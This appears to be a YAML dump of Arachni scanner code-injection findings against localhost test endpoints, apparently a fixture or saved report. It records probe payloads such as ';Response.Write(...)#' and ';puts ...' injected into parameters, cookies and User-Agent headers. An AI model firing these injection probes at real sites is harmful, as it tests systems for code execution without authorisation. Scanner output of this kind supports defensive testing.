injected: ! '";Response.Write(287630581954+4196403186331128)#'
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: form
remarks: {}
method: POST
response: ! '[4196690816913082, 4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzoxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/asp/link/straight?input=default
elem: link
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;Response.Write(287630581954+4196403186331128)
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ;Response.Write(287630581954+4196403186331128)
:follow_location: true
:injected: ;Response.Write(287630581954+4196403186331128)
:combo:
!binary "aW5wdXQ=": ;Response.Write(287630581954+4196403186331128)
:action: http://localhost:6875/asp/link/straight?input=default
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/asp/link/straight?input=default
injected: ;Response.Write(287630581954+4196403186331128)
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: link
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzoxNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/asp/link/append?input=default
elem: link
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;Response.Write(287630581954+4196403186331128)
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default;Response.Write(287630581954+4196403186331128)
:follow_location: true
:injected: default;Response.Write(287630581954+4196403186331128)
:combo:
!binary "aW5wdXQ=": default;Response.Write(287630581954+4196403186331128)
:action: http://localhost:6875/asp/link/append?input=default
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/asp/link/append?input=default
injected: default;Response.Write(287630581954+4196403186331128)
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: link
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzoxNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie
url: http://localhost:6875/asp/cookie/straight
elem: cookie
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ! ''';Response.Write(287630581954+4196403186331128)#'
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ! ''';Response.Write(287630581954+4196403186331128)#'
:injected: ! ''';Response.Write(287630581954+4196403186331128)#'
:combo:
!binary "Y29va2ll": ! ''';Response.Write(287630581954+4196403186331128)#'
:action: http://localhost:6875/asp/cookie/straight
:verification: false
:id: '4196690816913082'
var: cookie
url: http://localhost:6875/asp/cookie/straight
injected: ! ''';Response.Write(287630581954+4196403186331128)#'
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: cookie
remarks: {}
method: GET
response: ! '[4196690816913082, 4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie='%3BResponse.Write(287630581954%2B4196403186331128)#;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzoxOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie2
url: http://localhost:6875/asp/cookie/append
elem: cookie
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ! ''';Response.Write(287630581954+4196403186331128)#'
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value';Response.Write(287630581954+4196403186331128)#
:injected: cookie value';Response.Write(287630581954+4196403186331128)#
:combo:
!binary "Y29va2llMg==": cookie value';Response.Write(287630581954+4196403186331128)#
:action: http://localhost:6875/asp/cookie/append
:verification: false
:id: '4196690816913082'
var: cookie2
url: http://localhost:6875/asp/cookie/append
injected: cookie value';Response.Write(287630581954+4196403186331128)#
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: cookie
remarks: {}
method: GET
response: ! '[4196690816913082, 4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value'%3BResponse.Write(287630581954%2B4196403186331128)#
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzoyMSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:6875/asp/header/straight
elem: header
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ;Response.Write(287630581954+4196403186331128)
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ;Response.Write(287630581954+4196403186331128)
:injected: ;Response.Write(287630581954+4196403186331128)
:combo:
User-Agent: ;Response.Write(287630581954+4196403186331128)
:action: http://localhost:6875/asp/header/straight
:verification: false
:id: '4196690816913082'
var: User-Agent
url: http://localhost:6875/asp/header/straight
injected: ;Response.Write(287630581954+4196403186331128)
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: header
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ;Response.Write(287630581954+4196403186331128)
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzozMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:6875/asp/header/append
elem: header
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ;Response.Write(287630581954+4196403186331128)
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user;Response.Write(287630581954+4196403186331128)
:injected: arachni_user;Response.Write(287630581954+4196403186331128)
:combo:
User-Agent: arachni_user;Response.Write(287630581954+4196403186331128)
:action: http://localhost:6875/asp/header/append
:verification: false
:id: '4196690816913082'
var: User-Agent
url: http://localhost:6875/asp/header/append
injected: arachni_user;Response.Write(287630581954+4196403186331128)
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: header
remarks:
:stuff:
- Blah
- Blah2
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user;Response.Write(287630581954+4196403186331128)
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzozMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/ruby/form/append
elem: form
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;puts 287630581954+4196403186331128
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default;puts 287630581954+4196403186331128
:follow_location: true
:injected: default;puts 287630581954+4196403186331128
:combo:
!binary "aW5wdXQ=": default;puts 287630581954+4196403186331128
:action: http://localhost:6875/ruby/form/append
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/ruby/form/append
injected: default;puts 287630581954+4196403186331128
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: form
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo0MCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/ruby/form/straight
elem: form
method: POST
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ! ''';puts 287630581954+4196403186331128#'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! ''';puts 287630581954+4196403186331128#'
:follow_location: true
:injected: ! ''';puts 287630581954+4196403186331128#'
:combo:
!binary "aW5wdXQ=": ! ''';puts 287630581954+4196403186331128#'
:action: http://localhost:6875/ruby/form/straight
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/ruby/form/straight
injected: ! ''';puts 287630581954+4196403186331128#'
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: form
remarks: {}
method: POST
response: ! '[4196690816913082, 4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo0MSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
